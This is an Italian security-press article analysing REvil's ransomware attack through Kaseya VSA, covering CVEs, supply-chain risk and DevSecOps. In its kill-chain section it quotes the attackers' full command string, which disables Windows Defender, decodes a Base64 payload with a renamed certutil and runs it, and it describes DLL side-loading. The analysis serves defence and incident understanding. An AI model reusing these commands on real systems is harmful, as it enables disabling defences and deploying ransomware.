L'ANALISI TECNICA

Attacco a Kaseya: il ruolo del supply chain risk e dei processi DevSecOps

L’attacco a Kaseya è l’ultimo di una serie di incidenti di sicurezza che mettono in evidenza le criticità e gli impatti devastanti correlati con il rischio cyber della supply chain. Imparare da quanto accaduto può tornare utile per mitigarlo in futuro

Pubblicato il 13 Lug 2021

Pierguido Iezzi

Swascan Cybersecurity Strategy Director e Co Founder

Kaseya cyber risk alla supply chain

Il caso Kaseya ha sollevato o meglio portato in chiara evidenza l’importanza e allo stesso tempo la criticità e gli impatti devastanti relativi ai rischi cyber della supply chain. Non è il primo caso. Negli ultimi mesi abbiamo affrontato diversi incidenti cyber similari a partire dall’ormai noto e quasi dimenticato caso di SolarWinds.

Sul caso specifico dell’agent VSA di Kaseya ci siamo confrontati con approcci diversi e differenti. I più hanno affrontato la questione, correttamente, cercando di ricostruire o ricostruendo la Cyber Kill Chain. Il risultato? Uno zero-day sfruttato dalla gang ransomware di REvil.

Sono infatti appena state rilasciate pubblicamente le seguenti CVE scoperte dal CERT olandese che sembrano esser state patchate tra il 10/04/2021 e il 08/05/2021:

  • SQL Injection: CVE-2021-30117
  • Remote Code Execution (RCE): CVE-2021-30118
  • Local File Inclusion: CVE-2021-30121
  • XML External Entity (XEE): CVE-30201

Altre vulnerabilità scoperte dal team olandese sono ancora in fase di patching:

  • Credential Leak and business logic flaw: CVE-2021-30116
  • 2FA bypass: CVE-2021-30120

Sembrerebbe che proprio tramite l’exploit dello zero-day CVE-2021-30116 sul prodotto Kaseya VSA, REvil sia riuscito a compromettere diversi server. Sfruttando il rilascio di un update malevolo dai suddetti server verso gli agenti VSA installati sulle macchine Windows gestite, REvil ha infettato potenzialmente migliaia di dispositivi.

Attacco ransomware alla supply chain di Apple: rubati i progetti di nuovi dispositivi

I Cyber Risk Indicators della supply chain

I casi e gli “incidenti” come questo di Kaseya dimostrano l’importanza della gestione, governo, monitoraggio e analisi dei Cyber Risk Indicators della supply chain.

Ecco che i Cyber Risk Indicators della supply chain diventano una componente del cyber security framework aziendale:

  • obbligatori per gli adempimenti compliance GDPR e AgID;
  • essenziali per i requisiti ISO27001 e NIS;
  • importanti per le best practice cyber di OWASP.

Uno strumento finalizzato alla verifica dei rischi connessi alla gestione del portafoglio fornitori.

Il ruolo della DevSecOps

In questi mesi abbiamo assistito e gestito una serie di rischi legati ad applicazioni di terze parti che rappresentavano una minaccia per i nostri sistemi:

  • applicazioni vulnerabili;
  • credenziali di accesso compromesse;
  • code injection;
  • SQL injection.

Ecco, quindi, che la metodologia DevSecOps diventa protagonista indiscussa per una gestione della cyber security aziendale. Una metodologia necessaria per i fornitori di servizi e requirement fondamentale che dovrebbe essere richiesto dai clienti a tutti i fornitori.

La DevSecOps è l’estensione di DevOps, il modello più adottato dai dipartimenti IT per ottimizzare e accelerare il ciclo di vita del software, mettendo insieme sviluppo e operation, con l’aggiunta della security.

La gran parte dei bug che mettono a rischio la cybersecurity delle applicazioni ha origine nella progettazione iniziale, il che rende difficoltoso rilevarli e mitigarli nelle fasi successive.

Sostituire il modello verticale con uno ciclico permette di anticipare la risoluzione dei problemi, ridurre il time-to-market e i relativi costi di correzione.

La sicurezza informatica nello sviluppo del software: le buone regole da seguire

Il DevSecOps si prende carico dell’integrazione della componente di sicurezza nel processo di DevOps; integra controlli di sicurezza e processi nel flusso di lavoro DevOps.

Un flusso ciclico che deve prevedere:

  • Threat Modelling;
  • analisi del codice;
  • Change Management;
  • monitoraggio della compliance;
  • Vulnerability Assessment e Penetration Test;
  • Threat Intelligence;
  • Monitoring, Detection and Response;
  • Recovery Plan;
  • formazione continua e costante.

La Cyber Kill Chain dell’attacco a Kaseya

Tornando all’analisi tecnica, l’utilizzo dell’agente VSA per il deploy del ransomware ha permesso a REvil di sfruttare diverse caratteristiche dello stesso facilitandone quindi la diffusione senza essere scoperto.

Infatti, il payload sfrutta una caratteristica del codice dell’agent VSA il quale richiede, in fase di installazione, il trust dal software anti-malware delle sue applicazioni e cartelle di lavoro.

Qualsiasi eseguibile lanciato dal Kaseya Agent Monitor viene quindi ignorato a causa di quelle esclusioni, e ciò ha permesso a REvil di distribuire il dropper senza controllo.

Dalle analisi effettuate dal SOC Swascan Team sembra che il Kaseya Agent Monitor, il quale risiede in C:PROGRAM FILES(x86)<ID>AGENTMON.EXE, con l’ID che è la chiave di identificazione del server collegato all’istanza, lancia lo script maligno codificato in Base64 AGENT.CRT che si trova nella directory di lavoro dell’agent VSA per gli aggiornamenti (C:KWORKING). Il payload è codificato in modo da impedire alle difese anti-malware di eseguire analisi statica dei file.

Una volta distribuito il payload, l’agent Kaseya AGENTMON.EXE ha eseguito i seguenti comandi dalla shell di Windows, concatenati in una singola stringa:

cmd.exe /c ping 127.0.0.1 -n 1543 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe

Tale analisi è stata possibile grazie alle ricerche dei laboratori di Sophos e Huntress Lab i quali hanno condiviso i vari sample e IoC rilevati con la community.

Andando ad analizzare la seguente stringa possiamo dividere il comando nei vari step:

ping 127.0.0.1 -n 1543 > nul

il seguente comando è essenzialmente un timer, lo switch -n istruisce l’eseguibile PING.EXE a mandare un echo request al localhost (in questo caso 1543 richieste) ed agisce come una funzione “sleep”, ritardando quindi l’esecuzione del PoweShell di 1543 secondi.

Il valore è probabilmente randomico e varia da device a device: è ipotizzabile che tale numero venga generato su ogni server VSA compromesso ed inviato poi alle macchine da monitorare.

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Questa parte del comando PowerShell invece tenta di disabilitare la malware protection e l’anti-virus offerta da Windows Defender. Nello specifico vengono disabilitate le seguenti funzionalità:

  • real-time protection;
  • network protection contro exploit di vulnerabilità note;
  • scanning dei file scaricati e degli allegati;
  • scanning degli script;
  • ransomware protection;
  • protezione alla navigazione da parte delle applicazioni di accedere a domini malevoli che possono contenere malware, exploits, phishing scams e altri contenuti malevoli;
  • condivisione di potenziali threat con Microsoft Active Protection Service (MAPS);
  • condivisione automatica di sample con Microsoft.

La disabilitazione di queste feature impedisce a Microsoft Defender di bloccare file ed attività malevole.

copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe

Questo comando crea una copia del Windows Certificate Utility (certutil.exe), usato frequentemente per scaricare e decodificare contenuti cifrati dal web. La copia viene scritta in C:Windowscert.exe:

C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe

A questo punto la copia di Certutil viene usata per decifrare il payload in Base64 contenuto in AGENT.CRT e scriverlo come eseguibile (agent.exe) nella cartella di lavoro di Kaseya.

Il file risulta certificato da “PB03 TRANSPORT LTD”: questo certificato è probabilmente stato ottenuto per vie fraudolente o rubato ai proprietari leciti.

del /q /f c:kworkingagent.crt C:Windowscert.exe

In questa fase viene rimosso sia l’agent.crt e sia la copia di Certutil

c:kworkingagent.exe

E finalmente passiamo all’esecuzione del ransomware vero e proprio (ereditando i privilegi amministrativi di Agentmon.exe).

Analizzando il behavior dell’agente possiamo notare come vengano creati e lanciati due files:

  1. msmpeng.exe, una versione deprecata di Windows Defender (con certificato valido di Microsoft) vulnerabile ad attacchi di tipo “Side-Load” che hanno consentito quindi il caricamento della DLL contenente codice malevolo;
  2. mpsvc.dll anche esso certificato da “PB Transport LTD” (lo stesso applicato ad agent.exe) e posizionato nella stessa directory di msmpeng.exe, il quale importa la dll.

Una volta caricata la dll in memoria, il malware la rimuove dal disco. A questo punto msmpeng.exe, con l’ausilio della libreria mpsvc.dll, inizia l’encryption del disco locale.

Da questo punto in avanti, REvil si comporta come gli altri sample analizzati in Incident passati: viene quindi abilitata, sul firewall locale della macchina vittima, la scoperta degli host all’interno della rete mediante il comando:

netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes

Ed in seguito viene eseguita l’encryption dei vari file.

Valuta la qualità di questo articolo

La tua opinione è importante per noi!

Speciale PNRR

Tutti
Incentivi
Salute digitale
Formazione
Analisi
Sostenibilità
PA
Sostemibilità
Sicurezza
Digital Economy
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr

Articoli correlati